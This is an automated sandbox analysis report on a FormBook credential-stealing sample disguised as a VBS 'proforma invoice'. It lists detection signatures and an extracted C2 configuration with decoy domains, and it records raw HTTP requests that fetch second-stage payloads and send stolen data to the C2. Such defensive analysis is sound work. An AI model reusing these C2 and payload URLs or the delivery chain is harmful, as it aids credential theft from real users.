Windows Analysis Report
Signed Proforma Invoice 3645479_pdf.vbs

Overview

General Information

Sample name: Signed Proforma Invoice 3645479_pdf.vbs
Analysis ID: 1428347
MD5: 9e049f3029a5a6df1ab5d77d1a934ce3
SHA1: a31e0f94e0ee4dba78bc8adc291e1035d48561bd
SHA256: 0831fee0915f056e6ca78e9a83a2fe75260a197c0d64e7a200ab8ebfc3479536
Tags: vbs
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Browser Data Stealing
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lunazone.us/m07a/"], "decoy": ["shakishaskakes.com", "com222.shop", "thailand-package.in", "apexu.xyz", "xlmagnemite.com", "nagapura.com", "auralights.store", "springupfashionsalon.com", "ecoessentiaer.shop", "myorra.com", "xasvcd.xyz", "zachbynesdesigns.art", "qdaoxingsujiao.com", "workproapi.site", "pbmengineering.com", "cioccasubaruspecials.com", "tmotest.com", "yipaijihejiaoyu.com", "msaway.com", "jfn3d.cc", "potentpolitics.com", "gumuszemin.com", "elimmedcentre.com", "tveuropetravel.com", "cryptoshipping-cargo.site", "123b.bingo", "auspilifepharma.com", "nacob.top", "cnexam.net", "royal-buttons.com", "stanleywarner.autos", "s1mple-giveaways.com", "cairns.care", "slimshakeshop.online", "speakgeni.us", "qnttlw.com", "kitty-fit.com", "recordlabeltime.com", "balancceer.top", "cerkust.info", "cursosead.pro", "ukrfilmtrest.com", "rewardraptor.net", "welqi.com", "chronotypecolab.com", "loj-wroie.com", "lauracecilia.com", "luminouscar.info", "theschoolofbooks.shop", "manjuc.xyz", "successchasersltd.com", "matchuplover.com", "proomtb.com", "rankrise.shop", "theiceden.co", "adeptetho.com", "myshup.net", "bet7839.com", "propertiesfinance.com", "izii.online", "herb.boutique", "nobook.xyz", "yucampos.co", "liabillityinsurance.com"]}
Yara detected FormBook
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop edi 5_2_00416C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop edi 5_2_00416CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop edi 5_2_00417DA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 8_2_02F46CD4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 8_2_02F47DA5

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.187.200 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 203.161.57.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lunazone.us/m07a/
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: paste.ee
Performs DNS queries to domains with low reputation
Source: DNS query: www.xasvcd.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1Host: www.msaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1Host: www.lunazone.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View IP Address: 104.21.45.138 104.21.45.138
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 6_2_0B411F82 getaddrinfo,SleepEx,setsockopt,recv, 6_2_0B411F82
Source: global traffic HTTP traffic detected: GET /d/K2No9 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1Host: www.msaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1Host: www.lunazone.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: paste.ee
Source: unknown HTTP traffic detected: POST /m07a/ HTTP/1.1Host: www.msaway.comConnection: closeContent-Length: 175500Cache-Control: no-cacheOrigin: http://www.msaway.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msaway.com/m07a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 30 3d 4e 44 66 44 4e 6c 4a 5a 33 57 68 74 45 73 31 55 63 4c 69 51 54 79 4c 46 77 76 75 4f 48 78 75 6b 47 55 4f 6b 45 45 36 4b 47 71 42 4a 33 76 38 59 39 55 72 65 36 6e 75 35 66 2d 33 67 34 77 49 5a 71 59 33 78 79 4c 4b 41 72 76 47 50 43 33 70 68 47 39 31 70 33 37 75 58 4c 4c 53 4c 4a 61 4b 79 42 77 56 52 6b 68 74 30 68 6a 31 63 52 62 4d 63 51 65 37 71 62 68 33 44 4b 36 4a 38 6f 4a 4b 65 4f 30 74 78 49 68 61 78 73 56 78 75 68 56 71 51 7e 48 77 64 75 6d 7a 4e 6f 44 30 73 6d 57 5a 43 61 62 48 79 28 53 6a 31 53 76 33 47 68 6a 78 6e 7e 33 58 47 66 58 74 7a 4c 69 71 4e 61 38 62 4f 72 76 45 67 36 41 31 78 47 73 73 4b 74 43 52 42 64 6a 6c 65 4d 6a 50 6e 66 4f 38 31 6f 74 61 70 6a 67 4d 59 4f 71 69 62 6b 4e 47 36 47 45 78 46 76 54 4e 63 58 50 33 55 59 30 74 4b 68 6d 72 42 28 6e 67 4e 79 77 42 58 48 74 44 39 6b 57 4c 64 70 61 59 58 6f 6b 31 34 72 5f 54 33 54 62 63 37 4d 64 4e 67 55 59 66 7a 6c 66 34 67 39 76 47 50 33 34 47 57 6b 71 42 5f 69 31 47 43 63 69 35 36 62 5a 71 37 38 54 43 74 6b 36 6f 65 66 51 4f 63 54 30 41 78 49 5f 4d 53 79 31 28 45 4e 73 53 39 4e 6f 6c 55 50 34 53 73 55 30 6d 4c 32 6b 28 68 70 72 62 4c 28 65 28 34 7a 6b 45 6c 41 45 6a 6b 32 71 44 4e 6a 75 39 42 75 2d 74 65 30 42 6b 50 6c 4b 5a 74 4d 6d 78 66 6c 39 76 48 52 54 32 68 77 52 53 63 46 6f 6a 32 76 54 48 37 65 68 78 34 58 71 57 43 59 6c 46 79 72 76 33 6d 33 58 73 39 54 70 73 51 71 50 71 56 76 55 5a 4a 4a 61 6a 47 30 53 77 58 58 55 4f 47 52 36 6f 4a 38 33 42 30 57 39 30 4c 76 73 6f 50 41 4a 6c 45 35 75 4c 4d 6c 75 55 57 71 4c 77 6c 58 77 5a 6a 45 6c 5a 57 39 6f 62 59 59 2d 72 70 63 31 53 2d 28 5f 55 39 4f 66 73 66 74 45 36 37 46 5a 7e 34 64 33 34 61 35 33 4d 51 55 39 4b 45 57 4f 67 7a 77 79 56 4b 77 4c 73 53 32 62 59 68 69 67 63 70 77 5a 4d 34 79 6e 36 59 49 54 78 38 73 42 70 4e 7e 41 78 53 77 76 33 64 51 67 62 6e 6d 76 4a 70 41 42 4d 30 58 7a 76 79 62 65 70 53 5a 47 7e 67 50 36 55 6d 54 4d 52 56 70 4b 49 30 46 69 54 52 51 50 33 33 51 48 74 75 67 42 36 44 42 62 31 30 6c 76 68 65 31 56 66 4d 47 64 56 4c 6a 45 52 2d 6b 75 71 69 55 43 4a 62 34 52 38 32 74 32 63 6a 28 45 39 59 4c 4b 6e 5a 32 41 43 34 66 39 51 38 67 78 52 47 52 37 77 62 31 35 39 5a 50 62 77 72 38 49 46 45 49 2d 6f 4d 63 78 67 58 32 38 79 33 5a 4a 68 50 69 53 50 30 66 64 63 69 47 5f 68 45 41 4a 6b 5a 37 4b 62 6c 42 50 68 48 53 4b 47 51 4e 46 6f 48 31 76 43 74 33 32 6b 64 32 38 28 38 43 68 64 72 74 6c 34 6a 49 74 6a 39 67 4c 51 30 66 69 72 55 4f 5a 4b 47 48 4e 4c 5f 6d 6f 30 31 76 67 4b 38 52 79 34 69 52 76 74 72 39 74 46 71 52 70 77 38 76 77 6f 53 35 70 4d 5a 62 63 45 67 37 68 56 79 44 6f 49 6c 34 53 38 46 6f 74 63 59 78 74 30 39 6b
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Thu, 18 Apr 2024 19:12:11 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 18 Apr 2024 19:12:14 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 19:12:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 73 76 63 64 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.xasvcd.xyz Port 80</address></body></html>
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000001.00000002.2263421531.000001DC582E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
